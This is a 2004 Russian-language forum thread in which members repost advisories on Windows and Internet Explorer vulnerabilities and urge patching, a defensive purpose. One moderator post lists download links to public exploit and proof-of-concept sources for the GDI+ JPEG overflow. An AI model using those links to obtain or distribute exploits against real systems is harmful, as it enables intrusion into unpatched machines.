Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >  
Ответить в данную темуНачать новую тему
> Новые уязвимости в Windows NT 4.0/2K/XP/2003, Внимание! Установите себе заплатки!
YAN
сообщение 1.05.2004 - 19:37

Энтузиаст
****
орден III степени
Группа: Участник
Сообщений: 380
Регистрация: 26.01.2004
Пользователь №: 2024


14 новых уязвимостей в Microsoft Windows NT 4.0/2000/XP/2003

]]>http://www.securitylab.ru/44490.html]]>

Программа: Windows NT® Workstation 4.0, Windows NT Server 4.0, Windows NT Server 4.0, Terminal Server Edition, Windows 2000, Windows XP, Windows Server™ 2003
Опасность: Критическая

Наличие эксплоита: Нет
(НУ ПОКА НЕТ! Не дожидайтесь когда появятся вирусы на них)...... Установите себе "заплатки"!

Описание: Microsoft опубликовала исправление, которое устраняет 14 недавно обнаруженных уязвимостей в Windows NT 4.0/2000/XP/2003. Удаленный атакующий может получить полный контроль над системой, включая установку программ, просмотр, чтение или удаление данных или создание новых учетных записей.

1. LSASS Vulnerability - CAN-2003-0533: Удаленное переполнение буфера обнаружено в LSASS. Удаленный атакующий может эксплуатировать эту уязвимост, чтобы получить полный контроль над уязвимой системой.

2. LDAP Vulnerability - CAN-2003-0663: Удаленный атакующий может послать специально обработанное LDAP сообщение к контроллеру домена, чтобы заставить сервер прекратить обслуживать аутентифицированных пользователей в Active Directory домене.

3. PCT Vulnerability - CAN-2003-0719: Переполнение буфера обнаружено в Private Communications Transport (PCT) протоколе, который является частью Microsoft Secure Sockets Layer (SSL) библиотеки. Уязвимы только системы, использующие SSL протокол, и в некоторых случаях Windows 2000 контроллер домена. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

4. Winlogon Vulnerability - CAN-2003-0806: Переполнение буфера обнаружено в Windows logon process (Winlogon). Процесс не проверяет размер значений, используемых в процессе входа в систему. В результате удаленный атакующий может выполнить произвольный код на уязвимой системе. Уязвимы только системы, которые являются членами домена. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

5. Metafile Vulnerability - CAN-2003-0906: Переполнение буфера обнаружено в обработке Windows Metafile (WMF) и Enhanced Metafile (EMF) форматов изображений, позволяя удаленному атакующему выполнить произвольный код на уязвимой системе. Уязвимы любые программы, обрабатывающие WMF или EMF изображения. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

6. Help and Support Center Vulnerability - CAN-2003-0907: Уязвимость удаленного выполнения произвольного кода обнаружена в Help and Support Center в пути, которым система обрабатывает HCP URL. Атакующий может сконструировать специально обработанный HCP URL, который выполнить произвольный код на системе пользователя, просматривающего злонамеренную Web страницу или HTML email сообщение. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

7. Utility Manager Vulnerability - CAN-2003-0908: Уязвимость поднятия привилегий обнаружена в пути, которым Utility Manager запускает приложения. Зарегистрированный пользователь может заставить Utility Manager запустить приложение с SYSTEM привилегиями, чтобы получить полный контроль над уязвимой системой.

8. Windows Management Vulnerability - CAN-2003-0909: Уязвимость поднятия привилегий обнаружена в пути, которым Windows XP позволяет создавать задачи. При некоторых условиях, непривилегированный пользователь может создать задачу, которые будет выполнена с системными привилегиями, чтобы получить полный контроль над уязвимой системой.

9. Local Descriptor Table Vulnerability - CAN-2003-0910: Уязвимость поднятия привилегий обнаружена в программном интерфейсе, который используется для создания записей в Local Descriptor Table (LDT). Эти записи содержат информацию об сегментах памяти. Атакующий, зарегистрированный в системе локально, может создать специально обработанную запись чтобы получить доступ к защищенной памяти, чтобы получить полный контроль над системой.

10. H.323 Vulnerability - CAN-2004-0117: Уязвимость удаленного выполнения произвольного кода обнаружена в пути, которым Microsoft H.323 протокол обрабатывает некорректные запросы. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

11. Virtual DOS Machine Vulnerability - CAN-2004-0118: Уязвимость поднятия привилегий обнаружена в компоненте операционной системы, которая обрабатывает Virtual DOS Machine (VDM) подсистему. Уязвимость позволяет локальному пользователю получить полный контроль над уязвимой системой.

12. Negotiate SSP Vulnerability - CAN-2004-0119 Переполнение буфера обнаружена в Negotiate Security Software Provider (SSP) интерфейсе. Уязвимость обнаружена в пути, которым Negotiate SSP интерфейс обрабатывает значение, используемое в процессе аутентификации. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

13. SSL Vulnerability - CAN-2004-0120: Отказ в обслуживании обнаружен в Microsoft Secure Sockets Layer (SSL) библиотеке. Удаленный атакующий может создать специально обработанное SSL сообщение, которое заставить уязвимую систему прекратить обслуживать SSL подключения на Windows 2000 и Windows XP. На Windows Server 2003, система автоматически будет перезагружена.

14.ASN.1 “Double Free” Vulnerability - CAN-2004-0123: Уязвимость, позволяющая удаленно выполнить произвольный код, обнаружена в Microsoft ASN.1 библиотеке. Уязвимость связана с возможностью двойного освобождения памяти в Microsoft ASN.1 Library. . Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. Однако, большинство сценариев нападения приведут к отказу в обслуживании.
Перейти в начало страницы
 
+Цитировать сообщение
YAN
сообщение 2.05.2004 - 20:22

Энтузиаст
****
орден III степени
Группа: Участник
Сообщений: 380
Регистрация: 26.01.2004
Пользователь №: 2024


Настоятельно советую внести в свой бюджет статью расходов на безопасность своего ПК, разрешив автоматическое обновление системы. Много трафика он не съест, но зато спать будешь спокойнее!
Перейти в начало страницы
 
+Цитировать сообщение
Fay
сообщение 2.05.2004 - 21:09
Светящееся существо
******
орден III степениОрден VIII степениОтличительный знак Горсеть
Группа: Участник
Сообщений: 1150
Регистрация: 29.09.2003
Пользователь №: 80


Цитата(YAN @ 2.05.2004 - 20:22)
Настоятельно советую внести в свой бюджет статью расходов на безопасность своего ПК, разрешив автоматическое обновление системы. Много трафика он не съест, но зато спать будешь спокойнее!

>40Мб если в первый раз учитывая что есть уже сарвис пак(для XP) или стоит уже 3SP (для win2000).
Перейти в начало страницы
 
+Цитировать сообщение
Fay
сообщение 2.05.2004 - 21:12
Светящееся существо
******
орден III степениОрден VIII степениОтличительный знак Горсеть
Группа: Участник
Сообщений: 1150
Регистрация: 29.09.2003
Пользователь №: 80


В новом патче для Windows найдены ошибки

Компания Microsoft признала факт наличия ряда проблем с одним из последних патчей для операционных систем семейства Windows. Как выяснилось, при установке обновления на некоторые компьютеры с ОС Windows 2000, работа может серьезно замедляться, а в ряде случаев пользователи даже не могут войти в систему. Кроме этого, могут наблюдаться зависания компьютера при запуске. Проблема связана с патчем MS-04-014, выпущенным в начале апреля. Он исправляет больше десятка уязвимостей, связанных, в частности, с поддержкой протокола SSL. Проблемы же возникают в случае, если на компьютере установлен клиент виртуальных частных сетей компании Nortel Networks, а компонент IPSec Policy Agent задействован в автоматическом или ручном режиме. Проблемы возникают из-за того, что после установки патча Windows пытается загрузить из интернета несколько драйверов, а именно, Ipsecw2k.sys, Imcide.sys и Dlttape.sys. Однако при загрузке драйверов возникают ошибки, из-за чего и происходит замедление работы и зависание системы. В Microsoft работают над ликвидацией проблемы. В качестве предварительных мер рекомендуется удалить клиент виртуальных частных сетей Nortel и отключить запуск IPSec Policy Agent при начальной загрузке ОС
Перейти в начало страницы
 
+Цитировать сообщение
Fay
сообщение 2.05.2004 - 21:14
Светящееся существо
******
орден III степениОрден VIII степениОтличительный знак Горсеть
Группа: Участник
Сообщений: 1150
Регистрация: 29.09.2003
Пользователь №: 80


Microsoft предупреждает о появлении в Сети кода для реализации атак на ПК с Windows


Во Всемирной сети зафиксировано появление специализированного программного кода, при помощи которого можно организовать атаки на компьютеры, работающие под управлением операционных систем Microsoft Windows 2000, XP, Server 2003 и NT. Эксплойт, получивший название SSL Bomb, использует критическую уязвимость в Windows, заплатка для которой была выпущена софтверным гигантом ровно две недели назад.

Проблема связана с локальной подсистемой аутентификации пользователей LSASS (Local Security Authority Subsystem Service), а также протоколом PCT, являющемся частью библиотеки SSL. Ошибки переполнения буфера в этих компонентах позволяют вывести уязвимую машину из строя путем отправки составленных особым образом запросов. Причем дыра в LSASS представляет наибольшую опасность для пользователей операционных систем Windows 2000 и ХР, позволяя хакерам захватить полный контроль над удаленным ПК. Уязвимость в протоколе РСТ является критически важной для ОС Windows 2000 и NT и, кроме того, может применяться при проведении атак на компьютеры с Windows ХР и Server 2003. Правда, в последнем случае протокол РСТ по умолчанию отключен, поэтому организация нападения будет затруднена.

Во избежание неприятностей софтверный гигант рекомендует всем пользователям вышеназванных операционных систем как можно скорее установить заплатки, описанные в бюллетене безопасности MS04-011. Данный апдейт ликвидирует дыры в LSASS и SSL, закрывая при этом еще более десяти критически важных уязвимостей.
Перейти в начало страницы
 
+Цитировать сообщение
ХАЛТУРА
сообщение 21.05.2004 - 12:10

Exterior observer
*****
14 лет с форумоморден I степени
Группа: Участник
Сообщений: 919
Регистрация: 30.09.2003
Пользователь №: 133


Жмешь windows update конектишься к майкрософту и видишь все обновления, выбираешь например критические обновления и качаешь, они сразу устанавливаются, у меня на ХРени рус порядка 19 мегов обновление заняло.
Перейти в начало страницы
 
+Цитировать сообщение
NAT
сообщение 4.10.2004 - 11:51

заЮц гальванический
*****
орден VI степенибатарейка варта
Группа: Участник
Сообщений: 973
Регистрация: 19.12.2003
Пользователь №: 1598


Провайдер EasyNews зафиксировал появление в интернете первой вредоносной программы, использующей дыру в модуле обработки графических файлов формата JPEG, входящем в состав различных продуктов Microsoft.

О наличии данной уязвимости софтверный гигант сообщил в середине сентября. Проблема затрагивает чрезвычайно широкий спектр программных пакетов, включая операционные системы Windows, офисные приложения и пр. Более того, по заявлениям известного хакера Тома Листона, опубликовавшего открытое письмо на сайте Internet Storm Center (ISC), уязвимая библиотека входит в состав и многих других продуктов, созданных сторонними компаниями и независимыми разработчиками.

Первый эксплойт для JPEG-дыры был обнаружен на прошлой неделе. Правда, вредоносный код носил чисто демонстрационный характер и мог спровоцировать лишь зависание компьютера в результате ошибки переполнения буфера. Позднее стало известно о появлении еще одного, намного более опасного эксплойта, способного запускать командную строку Windows. Тогда же эксперты по вопросам сетевой безопасности сделали предположение, что эра JPEG-вирусов уже не за горами. Как теперь выяснилось, опасения специалистов были не напрасными.

По информации EasyNews, обнаруженный вредоносный код представляет собой JPEG-файл размером около 10 кб, распространяемый в USENET-конференциях. При попытке просмотра этого файла любым из уязвимых приложений возникает ошибка переполнения буфера, после чего вирус соединяется с неким FTP-сервером и загружает с него утилиту удаленного управления RAdmin. Таким образом, злоумышленники теоретически могут получить несанкционированный доступ к пораженной машине. Вполне вероятно, вредоносная программа выполняет и какие-то другие действия, однако это станет известно только после детального анализа кода вируса.

ЗЫ: поэтому не открывайте картинки от незнакомых людей

Сообщение отредактировано NAT - 4.10.2004 - 11:56
Перейти в начало страницы
 
+Цитировать сообщение
NAT
сообщение 11.10.2004 - 11:48

заЮц гальванический
*****
орден VI степенибатарейка варта
Группа: Участник
Сообщений: 973
Регистрация: 19.12.2003
Пользователь №: 1598


балинннн...

]]>http://km.ru/magazin/view.asp?id=ea0793219...81f28f76c587d57]]>

Первая демонстрационная программа, основанная на коде, с помощью которого вирусы смогут заражать графические файлы, на днях появилась в интернете. Специалисты по сетевой безопасности предрекают — новая вирусная эпидемия уже не за горами. Уязвимость заключается в том, каким образом программы Microsoft обрабатывают файлы самого популярного графического формата — JPEG.



Источник неприятностей — механизм GDI+ (Graphics Device Interface Plus), с помощью которого и происходит обработка графики в приложениях. В число уязвимых программ входят: Microsoft Windows XP, Windows Server 2003, Office XP, Office 2003, Internet Explorer 6 (включая Service Pack 1), Project, Visio, Picture It и Digital Image Pro.



Особую опасность представляет Internet Explorer. Это значит, чтобы подцепить вирус, достаточно просто зайти на какой-нибудь сайт с «зараженными» рисунками или фотографиями. Посещая проверенные и уважаемые сайты можно быть относительно уверенным в безопасности своего компьютера, но сайты эротического содержания — прямая угроза. Подсунуть туда зараженные фотографии злоумышленникам труда не составит.



А если зараженный баннер пролезет в популярные баннерообменные сети — эпидемия может захлестнуть весь Интернет за считанные дни. Вот что говорит Винсент Вифер, директор Подразделения компьютерной безопасности компании Symantec, производящей антивирусное программное обеспечение: «Уже в ближайшие дни появятся вирусы, использующие эту уязвимость. Ситуация особенно опасна, потому что JPEG сейчас используется абсолютно везде».



На доске объявлений сайта Microsoft уже лежит краткое описание проблемы и «заплатки» для Windows и Office, которые можно скачать. Там же можно проверить свой компьютер с помощью онлайн-скрипта на наличие на вашем компьютере остальных уязвимых программ. Этой дыре в безопасности присвоен высший рейтинг — «критическая». Если вы еще не установили себе Windows XP Service Pack 2, защитите свой компьютер хотя бы так.

blink.gif blink.gif blink.gif
Перейти в начало страницы
 
+Цитировать сообщение
NAT
сообщение 11.10.2004 - 13:38

заЮц гальванический
*****
орден VI степенибатарейка варта
Группа: Участник
Сообщений: 973
Регистрация: 19.12.2003
Пользователь №: 1598


]]>http://www.microsoft.com/security/bulletins/200409_jpeg.mspx]]>

по этой ссылке майкрософта можно скачать заплатки для винды и офиса, а также пройти он-лайн тестирование на уязвимость (что там есть еще, см. статью выше.
Перейти в начало страницы
 
+Цитировать сообщение
Neolite
сообщение 12.10.2004 - 08:36

#!/usr/bin/neolite
******
орден III степени
Группа: Модератор
Сообщений: 1728
Регистрация: 11.11.2003
Пользователь №: 887


1. Переполнение буфера при разборе JPEG в библиотеках GDI+ Windows
(buffer overflow), дополнено с 15 сентября 2004
г.
Опубликовано: 11 октября 2004 г.
Источник: MICROSOFT
Тип: библиотека
Опасность: 8
Описание: Переполнение буфера в функциях разбора JPEG
формата.
Продукты: BUSYNESSOBJECTS: Crystal Reports 10
MICROSOFT: Windows XP
MICROSOFT: Windows 2003 Server
MICROSOFT: Office XP
MICROSOFT: Office 2003
MICROSOFT: Project 2002
MICROSOFT: Project 2003
MICROSOFT: Visio 2002
MICROSOFT: Visio 2003
MICROSOFT: Visual Studio .NET 2002
MICROSOFT: Visual Studio .NET 2003
MICROSOFT: .NET Framework version
1.0 SDK
MICROSOFT: Greetings 2002
MICROSOFT: Picture It! 7.0
MICROSOFT: Digital Image Pro 7.0
MICROSOFT: Digital Image Pro 9
MICROSOFT: Picture It! 9
MICROSOFT: Digital Image Suite 9
MICROSOFT: GDI+
MICROSOFT: Internet Explorer 6.0
MICROSOFT: NET Framework 1.0
MICROSOFT: NET Framework 1.1
Документы: Nick D., Microsoft GDIPlus.DLL JPEG Parsing
Engine Buffer Overflow,
]]>http://www.security.nnov.ru/search/document.asp?docid=6810]]>
MICROSOFT: Microsoft Security Bulletin
MS04-028 Buffer Overrun in JPEG Processing (GDI+)
Could Allow Code Execution (833987),
]]>http://www.security.nnov.ru/search/document.asp?docid=6804]]>
CERT: US-CERT Technical Cyber Security
Alert TA04-260A -- Microsoft Windows JPEG component
buffer overflow,
]]>http://www.security.nnov.ru/search/document.asp?docid=6825]]>
SECUNIA: [SA12772] Crystal Reports
JPEG Processing Buffer Overflow Vulnerability,
]]>http://www.security.nnov.ru/search/document.asp?docid=6968]]>
Файлы: Windows XP JPEG Buffer Overflow POC ,
]]>http://www.security.nnov.ru/files/jpegcompoc.zip]]>
Example of JPG Exploit & Shellcode,
]]>http://www.security.nnov.ru/files/CAN-2004-0200.c]]>
GDI+ buffer overrun Exploit, Modified
by Crypto <crypto@xaker.ru>,
]]>http://www.security.nnov.ru/files/sacred_jpg.c]]>
GDIPLUS VULN - MS04-028 - CRASH
TEST JPEG,
]]>http://www.security.nnov.ru/files/CRASH-TEST.zip]]>
GDI+ JPEG Remote Exploit,
]]>http://www.security.nnov.ru/files/JpegOfDeath.c]]>
Microsoft Security Bulletin MS04-028
Buffer Overrun in JPEG Processing (GDI+) Could Allow
Code Execution (833987),
]]>http://www.microsoft.com/technet/security/...n/MS04-028.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4004]]>
Перейти в начало страницы
 
+Цитировать сообщение
Neolite
сообщение 13.10.2004 - 20:49

#!/usr/bin/neolite
******
орден III степени
Группа: Модератор
Сообщений: 1728
Регистрация: 11.11.2003
Пользователь №: 887


13 октября 2004

Удаленный отказ в обслуживании в Microsoft Windows NT/2000/XP
Программа: Microsoft Windows NT Server 4.0 Service Pack 6a , Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6, Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4, Microsoft Windows XP and Microsoft Windows XP Service Pack 1, Microsoft Windows XP 64-Bit Edition Service Pack 1, Microsoft Windows XP 64-Bit Edition Version 2003, Microsoft Windows Server 2003, Microsoft Windows Server 2003 64-Bit Edition
Опасность: Средняя

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Microsoft Windows NT/2000/XP. Удаленный пользователь может вызвать отказ в обслуживании или получить полный контроль над уязвимой системой.

Переполнение буфера обнаружено в NetDDE службе. Уязвимость позволяет удаленному атакующему выполнить произвольный код на уязвимой системе с SYSTEM привилегиями. Служба NetDDE отключена по умолчанию.

URL производителя: ]]>Microsoft.com]]>

Решение:Установите соответствующее обновление:

• Microsoft Windows NT Server 4.0 Service Pack 6a – ]]>Download the update]]>

• Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 – ]]>Download the update]]>

•Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 – ]]>Download the update]]>

•Microsoft Windows XP and Microsoft Windows XP Service Pack 1 – ]]>Download the update]]>

•Microsoft Windows XP 64-Bit Edition Service Pack 1 – ]]>Download the update]]>

•Microsoft Windows XP 64-Bit Edition Version 2003 – ]]>Download the update]]>

•Microsoft Windows Server 2003 – ]]>Download the update]]>

•Microsoft Windows Server 2003 64-Bit Edition – ]]>Download the update]]>


Другие публикации:

]]>MS04-031:Vulnerability in NetDDE Could Allow Remote Code Execution (841533)]]>
Neolite добавил(а) в нет данных
13 октября 2004

Восемь уязвимостей в Microsoft Internet Explorer
Программа: Microsoft Internet Explorer 5.01-6.0
Опасность: Критическая

Наличие эксплоита: Нет

Описание: Восемь уязвимостей обнаружено в Microsoft Internet Explorer. Злонамеренный пользователь может получить полный контроль над уязвимой системой, подменить URL в адресной строке и выполнить код в контексте защищенного Web сайта.

CSS Heap Memory Corruption Vulnerability - CAN-2004-0842: Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы выполнить произвольный код на системе целевого пользователя, просмотревшего эту страницу.

2. Similar Method Name Redirection Cross Domain Vulnerability - CAN-2004-0727: Уязвимость обнаружена в обработке методов навигации функциями, которые имеют похожие названия. Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы выполнить произвольный код сценария в Local Machine security zone в Internet Explorer или получить доступ к информации в другом домене.

3. Install Engine Vulnerability - CAN-2004-0216: Уязвимость в Inseng.dll позволяет удаленному атакующему выполнить произвольный код на уязвимой системе.

4. Drag and Drop Vulnerability - CAN-2004-0839: Уязвимость обнаружена в обработке Drag and Drop событий. Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы записать файл на систему целевого пользователя, посетившего Web страницу или прочитавшего злонамеренное e-mail сообщение.

5. Address Bar Spoofing on Double Byte Character Set Systems Vulnerability - CAN-2004-0844: Уязвимость обнаружена в обработке URL на Double Byte Character Set системах. В результате можно представить произвольный URL в адресной строке, отличный от URL загружаемой страницы.

6. Plug-in Navigation Address Bar Spoofing Vulnerability - CAN-2004-0843: Уязвимость обнаружен в обработке Plug-in навигации. В результате можно представить произвольный URL в адресной строке, отличный от URL загружаемой страницы.

7. Script in Image Tag File Download Vulnerability - CAN-2004-0841: Уязвимость обнаружен в пути, которым Internet Explorer обрабатывает сценарии в image тэгах. Удаленный атакующий может сконструировать злонамеренную Web страницу, которая запишет файл на систему целевого пользователя, посетившего злонамеренный Web сайт или просмотревшего злонамеренное email сообщение. В результате удаленный атакующий может получить полный контроль над уязвимой системой.

8. SSL Caching Vulnerability - CAN-2004-0845: Уязвимость обнаружена в пути, которым Internet Explorer подтверждает кэшированное содержание SSL Web сайтов. Удаленный атакующий может запустить произвольный сценарий на защищенном Web сайте.

URL производителя: ]]>http://www.Microsoft.com]]>

Решение: Установите соответствующее обновление:

Internet Explorer 5.01 Service Pack 3 on Windows 2000 SP3: Download the update.

Internet Explorer 5.01 Service Pack 4 on Windows 2000 SP4: Download the update.

Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Me: Download the update.

Internet Explorer 6 on Windows XP: Download the update.

Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3, on Microsoft Windows 2000 Service Pack 4, on Microsoft Windows XP, or on Microsoft Windows XP Service Pack 1: Download the update.

Internet Explorer 6 Service Pack 1 on Microsoft Windows NT Server 4.0 Service Pack 6a, on Microsoft Windows NT Server 4.0 Terminal Service Edition Service Pack 6, on Microsoft Windows 98, on Microsoft Windows 98 SE, or on Microsoft Windows Me: Download the update.

Internet Explorer 6 for Windows XP Service Pack 1 (64-Bit Edition): Download the update.

Internet Explorer 6 for Windows Server 2003: Download the update.

Internet Explorer 6 for Windows Server 2003 64-Bit Edition and Windows XP 64-Bit Edition Version 2003: Download the update.

Internet Explorer 6 for Windows XP Service Pack 2: Download the update.

Neolite добавил(а) в нет данных
13 октября 2004

Две уязвимости в различных версиях Microsoft Windows
Программа: Microsoft Windows NT Server 4.0 Service Pack 6a , Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6, Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4, Microsoft Windows XP and Microsoft Windows XP Service Pack 1, Microsoft Windows XP 64-Bit Edition Service Pack 1, Microsoft Windows XP 64-Bit Edition Version 2003, Microsoft Windows Server 2003, Microsoft Windows Server 2003 64-Bit Edition, Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), Microsoft Windows Millennium Edition (ME)
Опасность: Критическая

Наличие эксплоита: Нет

Описание: Две уязвимости обнаружено в различных версиях Microsoft Windows. Удаленный атакующий может выполнить произвольный код на уязвимой системе.

1. Уязвимость обнаружена в пути, которым Windows Shell запускает приложения. Удаленный атакующий может сконструировать специально обработанный Web сайт, чтобы выполнить произвольный код на системе целевого пользователя, посетившего этот сайт.

2. Уязвимость обнаружена в обработке специально обработанных запросов в Program Group Converter. Атакующий может сконструировать специально обработанный запрос, чтобы выполнить произвольный код на системе целевого пользователя, выполняющего некоторые действия, типа открытия прикрепленного файла или клика на html ссылку.

URL производителя: Microsoft.com

Решение:Установите соответствующее обновление:

Microsoft Windows NT Server 4.0 Service Pack 6a – Download the update

Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 – Download the update

Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 – Download the update

Microsoft Windows XP and Microsoft Windows XP Service Pack 1 – Download the update

Microsoft Windows XP 64-Bit Edition Service Pack 1 – Download the update

Microsoft Windows XP 64-Bit Edition Version 2003 – Download the update

Microsoft Windows Server 2003 – Download the update

Microsoft Windows Server 2003 64-Bit Edition – Download the update



Другие публикации:

MS04-037:Vulnerability in Windows Shell Could Allow Remote Code Execution (841356)
Neolite добавил(а) в нет данных
13 октября 2004

Удаленное выполнение произвольного кода в Microsoft Windows XP/2003
Программа: Microsoft Windows XP and Microsoft Windows XP Service Pack 1, Microsoft Windows XP 64-Bit Edition Service Pack 1, Microsoft Windows XP 64-Bit Edition Version 2003, Microsoft Windows Server 2003, Microsoft Windows Server 2003 64-Bit Edition
Опасность: Критическая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Microsoft Windows XP/2003. Удаленный атакующий может выполнить произвольный код на целевой системе.

Переполнение буфера обнаружено в Сжатых (zipped) Папках при обработке специально сформированных сжатых файлов. Удаленный атакующий может сконструировать специально обработанный сжатый файл, чтобы выполнить произвольный код на системе пользователя, посетившего злонамеренный Web сайт.

URL производителя:http://www.Microsoft.com

Решение:Установите соответствующее обновление:

Microsoft Windows XP and Microsoft Windows XP Service Pack 1 – Download the update

Microsoft Windows XP 64-Bit Edition Service Pack 1 – Download the update

Microsoft Windows XP 64-Bit Edition Version 2003 – Download the update

Microsoft Windows Server 2003 – Download the update

Microsoft Windows Server 2003 64-Bit Edition – Download the update



Другие публикации:

MS04-034:Vulnerability in Compressed (zipped) Folders Could Allow Remote Code Execution (873376)

Слишком много уязвимостей!!! Полный список смотрите на ]]>http://www.securitylab.ru/]]>!

Сообщение отредактировано Neolite - 13.10.2004 - 20:56
Перейти в начало страницы
 
+Цитировать сообщение
Neolite
сообщение 13.10.2004 - 21:18

#!/usr/bin/neolite
******
орден III степени
Группа: Модератор
Сообщений: 1728
Регистрация: 11.11.2003
Пользователь №: 887


Новости 13 октября 2004 г.:

1. Многочисленные ошибки в Microsoft Internet Explorer (multiple bugs)
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: клиент
Опасность: 9
Описание: переполнение буфера при обработке CSS, Скриптинг
в локальной зоне, переполнение буфера в Install
Engine, запись файла в известное расположение через
перетаскивание или скриптинг в таге <img>, подмена
адреса, межсайтовый скриптинг в SSL.
Продукты: MICROSOFT: Internet Explorer 5.5
MICROSOFT: Internet Explorer 6.0
Документы: MICROSOFT: Microsoft Security Bulletin MS04-038
Cumulative Security Update for Internet Explorer
(834707),
]]>http://www.security.nnov.ru/search/document.asp?docid=6983]]>
NGSSoftware Insight Security Research
Advisory (NISR), Microsoft Internet Explorer Install
Engine Control Buffer Overflow,
]]>http://www.security.nnov.ru/search/document.asp?docid=6985]]>
ACROS Security, ACROS Security: Poisoning
Cached HTTPS Documents in Internet Explorer,
]]>http://www.security.nnov.ru/search/document.asp?docid=6991]]>
Файлы: Microsoft Security Bulletin MS04-038 Cumulative
Security Update for Internet Explorer (834707),
]]>http://www.microsoft.com/technet/security/...n/MS04-038.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4091]]>

2. Выполнение кода через Microsoft NNTP (code execution)
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: удаленная
Опасность: 8
Описание: Многочисленные ошибки при разборе команды
XPAT.
Продукты: MICROSOFT: Windows NT 4.0 Server
MICROSOFT: Windows 2000 Server
MICROSOFT: Windows 2003 Server
MICROSOFT: Exchange 2000
MICROSOFT: Exchange 2003
Документы: MICROSOFT: Microsoft Security Bulletin MS04-036
Vulnerability in NNTP Could Allow Remote Code Execution
(883935),
]]>http://www.security.nnov.ru/search/document.asp?docid=6981]]>
CORE SECURITY TECHNOLOGIES ADVISORIES,
CORE-2004-0802: IIS NNTP Service XPAT Command Vulnerabilities,
]]>http://www.security.nnov.ru/search/document.asp?docid=6986]]>
Файлы: Microsoft Security Bulletin MS04-036 Vulnerability
in NNTP Could Allow Remote Code Execution (883935),
]]>http://www.microsoft.com/technet/security/...n/MS04-036.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4089]]>

3. Многочисленные ошибки в Microsoft Windows (multiple bugs)
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: клиент
Опасность: 8
Описание: Повышение привилегией через API управления
окнами, виртуальную DOS-машину, выполнение кода через
EMF/WMF файлы, DoS.
Продукты: MICROSOFT: Windows NT 4.0 Server
MICROSOFT: Windows 2000 Server
MICROSOFT: Windows 2000 Professional
MICROSOFT: Windows XP
MICROSOFT: Windows 2003 Server
Документы: MICROSOFT: Microsoft Security Bulletin MS04-032
Security Update for Microsoft Windows (840987),
]]>http://www.security.nnov.ru/search/document.asp?docid=6977]]>
EEYE: [Full-Disclosure] EEYE: Windows
VDM #UD Local Privilege Escalation,
]]>http://www.security.nnov.ru/search/document.asp?docid=6990]]>
Файлы: Microsoft Security Bulletin MS04-032 Security
Update for Microsoft Windows (840987),
]]>http://www.microsoft.com/technet/security/...n/MS04-032.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4085]]>

4. Переполнение буфера в Windows Shell (buffer overflow)
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: удаленная
Опасность: 6
Продукты: MICROSOFT: Windows NT 4.0 Server
MICROSOFT: Windows 2000 Server
MICROSOFT: Windows 2000 Professional
MICROSOFT: Windows XP
MICROSOFT: Windows 2003 Server
Документы: MICROSOFT: Microsoft Security Bulletin MS04-037
Vulnerability in Windows Shell Could Allow Remote
Code Execution (841356),
]]>http://www.security.nnov.ru/search/document.asp?docid=6982]]>
Файлы: Microsoft Security Bulletin MS04-037 Vulnerability
in Windows Shell Could Allow Remote Code Execution
(841356),
]]>http://www.microsoft.com/technet/security/...n/MS04-037.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4090]]>

5. Переполнение буфера в службе Windows SMTP (buffer overflow)
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: удаленная
Опасность: 6
Описание: Переполнение буфера при анализе DNS ответа
сконфигурированного сервера.
Продукты: MICROSOFT: Windows 2003 Server
MICROSOFT: Exchange 2003
Документы: MICROSOFT: Microsoft Security Bulletin MS04-035
Vulnerability in SMTP Could Allow Remote Code Execution
(885881),
]]>http://www.security.nnov.ru/search/document.asp?docid=6980]]>
Файлы: Microsoft Security Bulletin MS04-035 Vulnerability
in SMTP Could Allow Remote Code Execution (885881),
]]>http://www.microsoft.com/technet/security/...n/MS04-035.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4088]]>

6. DoS через XML в Microsoft WebDAV
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: удаленная
Опасность: 6
Описание: Большое количество аттрибутов в запросе приводит
к исчерпанию ресурсов.
Продукты: MICROSOFT: Internet Information Server 5.0
MICROSOFT: Internet Information Server
5.1
MICROSOFT: Internet Information Server
6.0
Документы: MICROSOFT: Microsoft Security Bulletin MS04-030
Vulnerability in WebDAV XML Message Handler Could
